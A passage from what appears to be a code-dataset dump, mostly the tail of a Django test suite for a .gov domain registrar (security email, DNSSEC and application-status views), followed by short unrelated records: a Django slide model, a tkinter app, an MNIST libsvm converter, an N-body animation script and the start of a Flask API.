kwargs={\"pk\": self.domain.id}))\n # once 
on the sidebar, once in the page title, once as H1\n self.assertContains(page, \"Organization name and mailing address\", count=3)\n\n def test_domain_org_name_address_content(self):\n \"\"\"Org name and address information appears on the page.\"\"\"\n self.domain_information.organization_name = \"Town of Igorville\"\n self.domain_information.save()\n page = self.app.get(reverse(\"domain-org-name-address\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Town of Igorville\")\n\n def test_domain_org_name_address_form(self):\n \"\"\"Submitting changes works on the org name address page.\"\"\"\n self.domain_information.organization_name = \"Town of Igorville\"\n self.domain_information.save()\n org_name_page = self.app.get(reverse(\"domain-org-name-address\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n org_name_page.form[\"organization_name\"] = \"Not igorville\"\n org_name_page.form[\"city\"] = \"Faketown\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result_page = org_name_page.form.submit()\n self.assertEqual(success_result_page.status_code, 200)\n\n self.assertContains(success_result_page, \"Not igorville\")\n self.assertContains(success_result_page, \"Faketown\")\n\n\nclass TestDomainContactInformation(TestDomainOverview):\n def test_domain_your_contact_information(self):\n \"\"\"Can load domain's your contact information page.\"\"\"\n page = self.client.get(reverse(\"domain-your-contact-information\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Your contact information\")\n\n def test_domain_your_contact_information_content(self):\n \"\"\"Logged-in user's contact information appears on the page.\"\"\"\n self.user.contact.first_name = \"Testy\"\n self.user.contact.save()\n page = self.app.get(reverse(\"domain-your-contact-information\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Testy\")\n\n\nclass TestDomainSecurityEmail(TestDomainOverview):\n def test_domain_security_email_existing_security_contact(self):\n \"\"\"Can load domain's security email page.\"\"\"\n self.mockSendPatch = patch(\"registrar.models.domain.registry.send\")\n self.mockedSendFunction = self.mockSendPatch.start()\n self.mockedSendFunction.side_effect = self.mockSend\n\n domain_contact, _ = Domain.objects.get_or_create(name=\"freeman.gov\")\n # Add current user to this domain\n _ = UserDomainRole(user=self.user, domain=domain_contact, role=\"admin\").save()\n page = self.client.get(reverse(\"domain-security-email\", kwargs={\"pk\": domain_contact.id}))\n\n # Loads correctly\n self.assertContains(page, \"Security email\")\n self.assertContains(page, \"security@mail.gov\")\n self.mockSendPatch.stop()\n\n def test_domain_security_email_no_security_contact(self):\n \"\"\"Loads a domain with no defined security email.\n We should not show the default.\"\"\"\n self.mockSendPatch = patch(\"registrar.models.domain.registry.send\")\n self.mockedSendFunction = self.mockSendPatch.start()\n self.mockedSendFunction.side_effect = self.mockSend\n\n page = self.client.get(reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}))\n\n # Loads correctly\n self.assertContains(page, \"Security email\")\n self.assertNotContains(page, \"dotgov@cisa.dhs.gov\")\n self.mockSendPatch.stop()\n\n def test_domain_security_email(self):\n \"\"\"Can load domain's security email page.\"\"\"\n page = self.client.get(reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}))\n 
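# NOTE: unlike the two variants above, this check does not patch registry.send; it simply loads the page and asserts the heading below.\n 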
self.assertContains(page, \"Security email\")\n\n def test_domain_security_email_form(self):\n \"\"\"Adding a security email works.\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n security_email_page = self.app.get(reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n security_email_page.form[\"security_email\"] = \"mayor@igorville.gov\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise(): # swallow log warning message\n result = security_email_page.form.submit()\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}),\n )\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = result.follow()\n self.assertContains(success_page, \"The security email for this domain has been updated\")\n\n def test_security_email_form_messages(self):\n \"\"\"\n Test against the success and error messages that are defined in the view\n \"\"\"\n p = \"adminpass\"\n self.client.login(username=\"superuser\", password=p)\n\n form_data_registry_error = {\n \"security_email\": \"test@failCreate.gov\",\n }\n\n form_data_contact_error = {\n \"security_email\": \"test@contactError.gov\",\n }\n\n form_data_success = {\n \"security_email\": \"test@something.gov\",\n }\n\n test_cases = [\n (\n \"RegistryError\",\n form_data_registry_error,\n str(GenericError(code=GenericErrorCodes.CANNOT_CONTACT_REGISTRY)),\n ),\n (\n \"ContactError\",\n form_data_contact_error,\n str(SecurityEmailError(code=SecurityEmailErrorCodes.BAD_DATA)),\n ),\n (\n \"RegistrySuccess\",\n form_data_success,\n \"The security email for this domain has been updated.\",\n ),\n # Add more test cases with different scenarios here\n ]\n\n for test_name, data, expected_message in test_cases:\n response = self.client.post(\n reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}),\n data=data,\n follow=True,\n )\n\n # Check the response status code, content, or any other relevant assertions\n self.assertEqual(response.status_code, 200)\n\n # Check if the expected message tag is set\n if test_name == \"RegistryError\" or test_name == \"ContactError\":\n message_tag = \"error\"\n elif test_name == \"RegistrySuccess\":\n message_tag = \"success\"\n else:\n # Handle other cases if needed\n message_tag = \"info\" # Change to the appropriate default\n\n # Check the message tag\n messages = list(response.context[\"messages\"])\n self.assertEqual(len(messages), 1)\n message = messages[0]\n self.assertEqual(message.tags, message_tag)\n self.assertEqual(message.message.strip(), expected_message.strip())\n\n def test_domain_overview_blocked_for_ineligible_user(self):\n \"\"\"We could easily duplicate this test for all domain management\n views, but a single url test should be solid enough since all domain\n management pages share the same permissions class\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"igorville.gov\")\n with less_console_noise():\n response = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 403)\n\n\nclass TestDomainDNSSEC(TestDomainOverview):\n\n \"\"\"MockEPPLib is already inherited.\"\"\"\n\n def test_dnssec_page_refreshes_enable_button(self):\n \"\"\"DNSSEC overview page loads when domain has no DNSSEC data\n and shows a 
'Enable DNSSEC' button.\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Enable DNSSEC\")\n\n def test_dnssec_page_loads_with_data_in_domain(self):\n \"\"\"DNSSEC overview page loads when domain has DNSSEC data\n and the template contains a button to disable DNSSEC.\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec\", kwargs={\"pk\": self.domain_multdsdata.id}))\n self.assertContains(page, \"Disable DNSSEC\")\n\n # Prepare the data for the POST request\n post_data = {\n \"disable_dnssec\": \"Disable DNSSEC\",\n }\n updated_page = self.client.post(\n reverse(\"domain-dns-dnssec\", kwargs={\"pk\": self.domain.id}),\n post_data,\n follow=True,\n )\n\n self.assertEqual(updated_page.status_code, 200)\n\n self.assertContains(updated_page, \"Enable DNSSEC\")\n\n def test_ds_form_loads_with_no_domain_data(self):\n \"\"\"DNSSEC Add DS data page loads when there is no\n domain DNSSEC data and shows a button to Add new record\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dnssec_none.id}))\n self.assertContains(page, \"You have no DS data added\")\n self.assertContains(page, \"Add new record\")\n\n def test_ds_form_loads_with_ds_data(self):\n \"\"\"DNSSEC Add DS data page loads when there is\n domain DNSSEC DS data and shows the data\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n self.assertContains(page, \"DS data record 1\")\n\n def test_ds_data_form_modal(self):\n \"\"\"When the user clicks save, a modal pops up.\"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n # Assert that a hidden trigger for the modal does not exist.\n # This hidden trigger will pop on the page when certain conditions are met:\n # 1) Initial form contained DS data, 2) All data is deleted and form is\n # submitted.\n self.assertNotContains(add_data_page, \"Trigger Disable DNSSEC Modal\")\n # Simulate deleting all data\n form_data = {}\n response = self.client.post(\n reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}),\n data=form_data,\n )\n self.assertEqual(response.status_code, 200) # Adjust status code as needed\n # Now check to see whether the JS trigger for the modal is present on the page\n self.assertContains(response, \"Trigger Disable DNSSEC Modal\")\n\n def test_ds_data_form_submits(self):\n \"\"\"DS data form submits successfully\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise(): # swallow log warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post, response should be a redirect\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}),\n )\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n page = result.follow()\n self.assertContains(page, \"The DS data records for this domain have been updated.\")\n\n def test_ds_data_form_invalid(self):\n \"\"\"DS data form errors with invalid data (missing required fields)\n\n Uses self.app WebTest because we need to interact with forms.\n 
\"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # all four form fields are required, so will test with each blank\n add_data_page.forms[0][\"form-0-key_tag\"] = \"\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"\"\n add_data_page.forms[0][\"form-0-digest\"] = \"\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(result, \"Key tag is required\", count=2, status_code=200)\n self.assertContains(result, \"Algorithm is required\", count=2, status_code=200)\n self.assertContains(result, \"Digest type is required\", count=2, status_code=200)\n self.assertContains(result, \"Digest is required\", count=2, status_code=200)\n\n def test_ds_data_form_invalid_keytag(self):\n \"\"\"DS data form errors with invalid data (key tag too large)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"65536\" # > 65535\n add_data_page.forms[0][\"form-0-algorithm\"] = \"\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"\"\n add_data_page.forms[0][\"form-0-digest\"] = \"\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_KEYTAG_SIZE)), count=2, status_code=200\n )\n\n def test_ds_data_form_invalid_digest_chars(self):\n \"\"\"DS data form errors with invalid data (digest contains non hexadecimal chars)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"1234\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"3\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"1\"\n add_data_page.forms[0][\"form-0-digest\"] = \"GG1234\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_DIGEST_CHARS)), count=2, status_code=200\n )\n\n def test_ds_data_form_invalid_digest_sha1(self):\n \"\"\"DS data form errors with invalid data (digest is invalid sha-1)\n\n Uses self.app WebTest 
because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"1234\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"3\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"1\" # SHA-1\n add_data_page.forms[0][\"form-0-digest\"] = \"A123\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_DIGEST_SHA1)), count=2, status_code=200\n )\n\n def test_ds_data_form_invalid_digest_sha256(self):\n \"\"\"DS data form errors with invalid data (digest is invalid sha-256)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"1234\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"3\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"2\" # SHA-256\n add_data_page.forms[0][\"form-0-digest\"] = \"GG1234\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_DIGEST_SHA256)), count=2, status_code=200\n )\n\n\nclass TestApplicationStatus(TestWithUser, WebTest):\n def setUp(self):\n super().setUp()\n self.app.set_user(self.user.username)\n self.client.force_login(self.user)\n\n def test_application_status(self):\n \"\"\"Checking application status page\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"city1.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n\n def test_application_status_with_ineligible_user(self):\n \"\"\"Checking application status page with a blocked user.\n The user should still have access to view it.\"\"\"\n self.user.status = \"ineligible\"\n self.user.save()\n\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n 
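# NOTE: webtest's click() follows the first anchor whose text matches the given pattern; index=0 disambiguates when several \"Manage\" links render, one per table row.\n 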
self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n\n def test_application_withdraw(self):\n \"\"\"Checking application status page\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"city1.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n # click the \"Withdraw request\" button\n withdraw_page = detail_page.click(\"Withdraw request\")\n self.assertContains(withdraw_page, \"Withdraw request for\")\n home_page = withdraw_page.click(\"Withdraw request\")\n # confirm that it has redirected, and the status has been updated to withdrawn\n self.assertRedirects(\n home_page,\n \"/\",\n status_code=302,\n target_status_code=200,\n fetch_redirect_response=True,\n )\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"Withdrawn\")\n\n def test_application_withdraw_no_permissions(self):\n \"\"\"Can't withdraw applications as a restricted user.\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"city1.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n # Restricted user trying to withdraw results in 403 error\n with less_console_noise():\n for url_name in [\n \"application-withdraw-confirmation\",\n \"application-withdrawn\",\n ]:\n with self.subTest(url_name=url_name):\n page = self.client.get(reverse(url_name, kwargs={\"pk\": application.pk}))\n self.assertEqual(page.status_code, 403)\n\n def test_application_status_no_permissions(self):\n \"\"\"Can't access applications without being the creator.\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n other_user = User()\n other_user.save()\n application.creator = other_user\n application.save()\n\n # PermissionDeniedErrors make lots of noise in test output\n with less_console_noise():\n for url_name in [\n \"application-status\",\n \"application-withdraw-confirmation\",\n \"application-withdrawn\",\n ]:\n with self.subTest(url_name=url_name):\n page = self.client.get(reverse(url_name, kwargs={\"pk\": application.pk}))\n self.assertEqual(page.status_code, 403)\n\n def test_approved_application_not_in_active_requests(self):\n \"\"\"An approved application is not shown in the Active\n Requests table on home.html.\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.APPROVED, user=self.user)\n 
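# NOTE: completed_application is a shared fixture helper (presumably defined in the suite's common test utilities) that builds and saves a fully populated DomainApplication; a hypothetical minimal version:\n #\n # def completed_application(status, user):\n # return DomainApplication.objects.create(\n # status=status, creator=user, organization_name=\"Testorg\",\n # )\n 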
application.save()\n\n home_page = self.app.get(\"/\")\n # This works in our test environment because creating\n # an approved application here does not generate a\n # domain object, so we do not expect to see 'city.gov'\n # in either the Domains or Requests tables.\n self.assertNotContains(home_page, \"city.gov\")\n","repo_name":"cisagov/manage.get.gov","sub_path":"src/registrar/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":109579,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"67"} +{"seq_id":"25073007563","text":"from django.db import models\n\n\nclass Group(models.Model):\n \"\"\"Combine slides for the main page into groups, for easier editing and storage\"\"\"\n name = models.CharField(verbose_name='Group name', max_length=50)\n\n class Meta:\n verbose_name = 'Slide group'\n verbose_name_plural = 'Slide groups'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass Slide(models.Model):\n \"\"\"Slides on the main page of the site\"\"\"\n\n slide_group = models.ForeignKey(Group, on_delete=models.DO_NOTHING)\n slide_img = models.ImageField(verbose_name='Slide image', upload_to='index/slide/')\n slide_description = models.TextField(verbose_name='Text / Description (h2 / p)', blank=True, null=True)\n slide_link_name = models.CharField(verbose_name='Button label', blank=True, null=True, max_length=100,\n default='Go')\n slide_link_url = models.CharField(verbose_name='Link', blank=True, null=True, max_length=250)\n slide_order = models.IntegerField(verbose_name='Order', default=0)\n slide_visible = models.BooleanField(verbose_name='Show?', default=True)\n\n class Meta:\n ordering = ['slide_group', 'slide_order', 'id']\n verbose_name = 'Slide'\n verbose_name_plural = 'Slides'\n\n def __str__(self):\n return f'Slide {self.id}'\n","repo_name":"sergio-kzn/derevo116.ru","sub_path":"Index/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73069118934","text":"import tkinter as tk\n\nfrom resources.button_panel import ButtonPanel\nfrom resources.smartdatabase import SmartKeyDatabase\n\n\nclass App:\n def __init__(\n self,\n ):\n self.root = tk.Tk()\n self.root.title(\"SmartKey\")\n self.root.minsize(750, 600)\n\n # DATABASE\n\n smart_key_db = SmartKeyDatabase()\n smart_key_db.create_table()\n\n try:\n smart_key_db.add_admin_user()\n except Exception:\n error_label = tk.Label(\n self.root,\n text=\"A database error occurred\".upper(),\n fg=\"red\",\n font=(\"System\", 20),\n )\n error_label.pack()\n else:\n # BUTTONS PANEL\n self.buttons_panel = tk.LabelFrame(self.root, text=\"Buttons Panel\")\n\n self.button_frame = ButtonPanel(self.buttons_panel, self.root)\n self.button_frame.frame.pack(fill=\"both\", expand=True)\n\n self.buttons_panel.pack(expand=True, fill=\"x\", side=\"top\")\n\n\nif __name__ == \"__main__\":\n app = App()\n app.root.mainloop()\n","repo_name":"ivegoie/SmartKey-PYM3","sub_path":"smartkey.py","file_name":"smartkey.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8134669360","text":"'''\r\nCreated on 11 dec. 
2013\r\n\r\n@author: efarhan\r\n'''\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\nfrom engine.const import CONST, log\r\nfrom json_export.json_main import get_element\r\nfrom engine.vector import Vector2\r\nfrom render_engine.img_manager import img_manager\r\n\r\n\r\nclass Animation():\r\n def __init__(self,obj):\r\n self.obj = obj\r\n self.img = None\r\n self.path = \"\"\r\n self.root_path = self.path\r\n self.state_range = {}\r\n self.path_list = []\r\n self.state = \"\"\r\n self.anim_counter = 0\r\n self.anim_freq = CONST.animation_step\r\n self.img_indexes = []\r\n self.index = 0\r\n\r\n def load_images(self,size=None,tmp = False):\r\n self.img_indexes = []\r\n \r\n for p in self.path_list:\r\n \r\n path = CONST.path_prefix+self.root_path+p\r\n files = []\r\n if \".png\" in path:\r\n files = [path]\r\n else:\r\n files = [ os.path.join(path, f) for f in listdir(path) if (isfile(join(path, f)) and f.find(\".png\") != -1) ]\r\n files.sort()\r\n for f in files:\r\n self.img_indexes.append(img_manager.load_image(f,tmp))\r\n try:\r\n self.img = self.img_indexes[0]\r\n except IndexError:\r\n pass\r\n if size is None:\r\n self.size = img_manager.get_size(self.img)\r\n else:\r\n self.size = Vector2(size)\r\n if self.obj:\r\n self.obj.update_rect()\r\n\r\n def update_animation(self,state=\"\",invert=False,lock=False):\r\n if state != \"\":\r\n self.state = state\r\n if self.anim_counter == self.anim_freq:\r\n anim_index = []\r\n if self.state_range == {}:\r\n anim_index = self.img_indexes\r\n else:\r\n try:\r\n anim_index = self.img_indexes[self.state_range[self.state][0]:self.state_range[self.state][1]]\r\n except KeyError:\r\n return\r\n try:\r\n find_index = anim_index.index(self.img)\r\n if not invert:\r\n if find_index == len(anim_index)-1:\r\n self.index = 0\r\n else:\r\n self.index = find_index+1\r\n else:\r\n if find_index == 0:\r\n self.index = len(anim_index)-1\r\n\r\n else:\r\n self.index = find_index-1\r\n self.img = anim_index[self.index]\r\n except ValueError:\r\n try:\r\n self.index = 0\r\n self.img = anim_index[self.index]\r\n\r\n except IndexError:\r\n pass\r\n self.anim_counter = 0\r\n else:\r\n self.anim_counter += 1\r\n\r\n @staticmethod\r\n def parse_animation(anim_data,obj=None):\r\n anim_type = get_element(anim_data,\"anim_type\")\r\n root_path = get_element(anim_data, \"root_path\")\r\n path_list = get_element(anim_data,\"path_list\")\r\n state_range = get_element(anim_data, \"state_range\")\r\n anim_freq = get_element(anim_data, \"anim_freq\")\r\n if not anim_freq:\r\n anim_freq = CONST.animation_step\r\n anim = None\r\n \r\n '''Check type entry is a string with '.' or alpha'''\r\n if anim_type and isinstance(anim_type, CONST.string_type):\r\n for c in anim_type:\r\n if c != '.' 
and c != '_' and not c.isalpha():\r\n log(\"Error: Invalid character type for animation type: \"+anim_type,1)\r\n return None\r\n elif anim_type is None:\r\n anim_type = ''\r\n else:\r\n log(\"Error: Invalid type of anim_type, given: \"+type(anim_type),1)\r\n return None\r\n if anim_type is not '':\r\n dir_list = anim_type.split(\".\")\r\n\r\n module_name = \".\".join(dir_list[0:len(dir_list)-1])\r\n class_name = dir_list[len(dir_list)-1]\r\n log(module_name+\" \"+class_name)\r\n try:\r\n exec('''from %s import %s'''%(module_name, class_name ))\r\n except ImportError as e:\r\n log(\"Error while importing \"+anim_type+\" \"+str(e), 1)\r\n return None\r\n \r\n try:\r\n d = locals()\r\n exec('''anim = %s(obj)'''% class_name, globals(), d)\r\n anim = d['anim']\r\n except Exception as e:\r\n log(\"Error initializing animation: \"+str(e), 1)\r\n return None\r\n else:\r\n log(\"Use default animation\")\r\n anim = Animation(obj)\r\n\r\n if anim and root_path:\r\n anim.root_path = root_path\r\n else:\r\n log(\"Error: UNDEFINED anim or root_path is None\",1)\r\n return anim\r\n if path_list and isinstance(path_list,list):\r\n anim.path_list = path_list\r\n if state_range and isinstance(state_range,dict):\r\n anim.state_range = state_range\r\n anim.anim_freq = anim_freq\r\n return anim\r\n def get_screen_pos(self):\r\n return (0,0)","repo_name":"EliasFarhan/GBJam","sub_path":"animation/animation_main.py","file_name":"animation_main.py","file_ext":"py","file_size_in_byte":5215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"26510059222","text":"import numpy as np\n\n# Train Data\nx_train = np.loadtxt('../data/mnist/train.csv',delimiter=',',dtype=np.float64)\ny_train = x_train[:,-1].reshape(-1,1)\nx_train = np.delete(x_train,-1,1)\nx_train /= 255 # Scaling\n\n# Test Data\nx_test = np.loadtxt('../data/mnist/test.csv',delimiter=',',dtype=np.float64)\ny_test = x_test[:,-1].reshape(-1,1)\nx_test = np.delete(x_test,-1,1)\nx_test /= 255 # Scaling\n\nprint(\"Started copying\")\nwith open('../data/mnist/libsvm_train.txt','w') as f:\n for idx in range(x_train.shape[0]):\n f.writelines(\"{0} \".format(y_train[idx][0]))\n _ = [f.writelines(\"{0}:{1} \".format(idy+1,x_train[idx][idy])) for idy in range(x_train.shape[1])]\n f.writelines(\"\\n\")\nprint(\"Finished copying train data\")\n\nwith open('../data/mnist/libsvm_test.txt','w') as f:\n for idx in range(x_test.shape[0]):\n f.writelines(\"{0} \".format(y_test[idx][0]))\n _ = [f.writelines(\"{0}:{1} \".format(idy+1,x_test[idx][idy])) for idy in range(x_test.shape[1])]\n f.writelines(\"\\n\")\nprint(\"Finished copying test data\")","repo_name":"messi313/COL-774-Assignments","sub_path":"Assignment 2/scripts/libsvm_data.py","file_name":"libsvm_data.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"604780939","text":"import os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom core import radii_units_colors\nfrom core import get_positions_from_row\n\n\ntry:\n if len(sys.argv) < 2:\n raise OSError(\"Provide an existing data file name from the data/ folder\")\n\n filename = sys.argv[1]\n if not os.path.isfile(f\"data/{filename}\"):\n raise OSError(f\"The file {filename} does not exist. 
Please provide an existing data file in the data/ folder\")\n\n print(\"Reading file...\")\n positions = pd.read_csv(f\"data/{filename}\", delimiter=\",\")\n print(\"File read.\")\n\n animation_rows = np.linspace(0, len(positions)- 1, 100, dtype=int)\n animation_positions = positions.iloc[animation_rows,:]\n\n for idx, row in animation_positions.iterrows():\n (time, central_x, central_y, moving_x, moving_y, particles_xs, particles_ys) = get_positions_from_row(row)\n\n plt.clf()\n plt.scatter(central_x, central_y, color='b')\n plt.scatter(moving_x, moving_y, color='r')\n for idx, (radius, num, color) in enumerate(radii_units_colors):\n plt.scatter(particles_xs[idx], particles_ys[idx], s=1, color=color, label=rf\"$r = {radius}$\")\n \n plt.xlim([-100, 100])\n plt.ylim([-100, 100])\n plt.title(time)\n plt.pause(0.01)\n \nexcept OSError as e:\n print(repr(e))","repo_name":"yijerjer/NBodySimulation","sub_path":"script submit/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26170293389","text":"from flask import Flask\nfrom flask_restful import Api, Resource, reqparse, abort, fields, marshal_with\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import exc\n\n\n\n#Create the FlasK App\napp = Flask(__name__)\n#Create the API wrapper and pass the app to it \napi = Api(app) \n#Create the Database object and initialise it with app\ndb = SQLAlchemy(app)\n\n\n#Define the app configs for SQL Alchemy\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///film_database.db\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = 